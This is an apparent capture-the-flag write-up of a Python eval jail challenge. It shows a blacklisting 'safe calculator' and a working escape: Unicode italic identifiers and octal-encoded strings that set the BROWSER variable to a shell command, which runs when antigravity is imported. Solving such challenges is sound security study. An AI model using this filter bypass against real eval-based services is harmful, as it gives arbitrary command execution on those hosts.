- Published on
TFCCTF 2023 – My third calculator
- Authors
- Name
- Lumy
My third calculator (482 points, 14 solves)
I learned a few things from the last ones
Table of Contents
Source code
import sys
print("This is a safe calculator")
inp = input("Formula: ")
sys.stdin.close()
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ."
if any(x in inp for x in blacklist):
print("Nice try")
exit()
fns = {
"__builtins__": {"setattr": setattr, "__import__": __import__, "chr": chr}
}
print(eval(inp, fns, fns))
Solution
To escape letters filter, we can use unicode encoding and also octal char representation as below :
Website for string to unicode encoding : qaz.wtf/u/convert.cgi
Website for string to octal encoding : onlinestringtools.com/convert-string-to-octal
Inspiration : lebr0nli.github.io/blog/security/idek-CTF-2022/#intended-solution
Here is the string representation of the payload used :
__import__('antigravity',setattr(__import__('os'),'environ',dict(BROWSER='ls" #%s')))
Here is the solution using unicode and octal representation to bypass the blacklist
__𝑖𝑚𝑝𝑜𝑟𝑡__('\141\156\164\151\147\162\141\166\151\164\171',𝑠𝑒𝑡𝑎𝑡𝑡𝑟(__𝑖𝑚𝑝𝑜𝑟𝑡__('\157\163'),'\145\156\166\151\162\157\156',{"\102\122\117\127\123\105\122":'\57\142\151\156\57\163\150\40\55\143\40\42\57\142\151\156\57\154\163\42\40\43\45\163'}))